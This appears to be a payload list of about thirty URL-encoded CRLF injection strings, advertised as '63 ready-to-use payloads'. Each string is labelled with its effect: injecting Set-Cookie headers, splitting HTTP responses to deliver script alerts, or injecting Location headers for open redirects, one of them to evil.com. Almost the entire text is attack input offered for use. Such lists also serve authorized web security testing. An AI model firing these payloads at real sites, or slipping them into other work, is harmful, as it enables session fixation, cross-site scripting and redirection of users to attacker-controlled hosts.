CRLF
63 ready-to-use payloads
/%%0a0aSet-Cookie:crlf=injection
CRLF → inject arbitrary Set-Cookie header
/%%0a0aSet-Cookie:crlf=injection
/%0aSet-Cookie:coffin=hi;
CRLF → inject arbitrary Set-Cookie header
/%0aSet-Cookie:coffin=hi;
/%0aSet-Cookie:crlf=injection
CRLF → inject arbitrary Set-Cookie header
/%0aSet-Cookie:crlf=injection
/%0d%0a%0d%0a<script>alert('XSS')</script>;
CRLF → inject XSS payload via response splitting
/%0d%0a%0d%0a<script>alert('XSS')</script>;/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0...
CRLF → HTTP response splitting + XSS injection
/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2e%2e
/%0d%0aContent-Type:%20text%2fhtml%0d%0aHTTP%2f1.1...
CRLF → HTTP response splitting + XSS injection
/%0d%0aContent-Type:%20text%2fhtml%0d%0aHTTP%2f1.1%20200%20OK%0d%0aContent-Type:%20text%2fhtml%0d%0a%0d%0a%3Cscript%3Ealert('XSS');%3C%2fscript%3E%0d%0aHost:%20{{Hostname}}%0d%0aCookie:%20coffin=h...
CRLF → inject arbitrary Set-Cookie header
%0d%0aHost:%20{{Hostname}}%0d%0aCookie:%20coffin=hi%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aSet-Cookie:%20coffin=hi%0d%0a%0d%0a/%0d%0ahost:%20www.google.com
CRLF → inject Location header (open redirect)
/%0d%0ahost:%20www.google.com
/%0d%0ahost:%20www.google.com%0d%0a
CRLF → inject Location header (open redirect)
/%0d%0ahost:%20www.google.com%0d%0a
/%0d%0aLocation:%20http://evil.com
CRLF → inject Location header (open redirect)
/%0d%0aLocation:%20http://evil.com
/%0d%0aLocation:www.google.com%0d%0a
CRLF → inject Location header (open redirect)
/%0d%0aLocation:www.google.com%0d%0a
/%0d%0aSet-Cookie:coffin=hi;
CRLF → inject arbitrary Set-Cookie header
/%0d%0aSet-Cookie:coffin=hi;
/%0d%0aSet-Cookie:crlf=injection
CRLF → inject arbitrary Set-Cookie header
/%0d%0aSet-Cookie:crlf=injection
/%0dSet-Cookie:coffin=hi;
CRLF → inject arbitrary Set-Cookie header
/%0dSet-Cookie:coffin=hi;
/%0dSet-Cookie:crlf=injection
CRLF → inject arbitrary Set-Cookie header
/%0dSet-Cookie:crlf=injection
“%23%0aLocation:%0d%0aContent-Type:text/html%0d%0a...
CRLF → HTTP response splitting + XSS injection
“%23%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a<svg/onload%3dalert%28document.domain%29>”
/%23%0aSet-Cookie:crlf=injection
CRLF → inject arbitrary Set-Cookie header
/%23%0aSet-Cookie:crlf=injection
/%23%0D%0ALocation:www.google.com;
CRLF → inject Location header (open redirect)
/%23%0D%0ALocation:www.google.com;
/%23%0d%0aSet-Cookie:crlf=injection
CRLF → inject arbitrary Set-Cookie header
/%23%0d%0aSet-Cookie:crlf=injection
/%23%0dSet-Cookie:crlf=injection
CRLF → inject arbitrary Set-Cookie header
/%23%0dSet-Cookie:crlf=injection
/%250aSet-Cookie:crlf=injection
CRLF → inject arbitrary Set-Cookie header
/%250aSet-Cookie:crlf=injection
/%25250aSet-Cookie:crlf=injection
CRLF → inject arbitrary Set-Cookie header
/%25250aSet-Cookie:crlf=injection
/%25%30%61Set-Cookie:crlf=injection
CRLF → inject arbitrary Set-Cookie header
/%25%30%61Set-Cookie:crlf=injection
/%25%30aSet-Cookie:crlf=injection
CRLF → inject arbitrary Set-Cookie header
/%25%30aSet-Cookie:crlf=injection
/%2e%2e%2f%0d%0aSet-Cookie:crlf=injection
CRLF → inject arbitrary Set-Cookie header
/%2e%2e%2f%0d%0aSet-Cookie:crlf=injection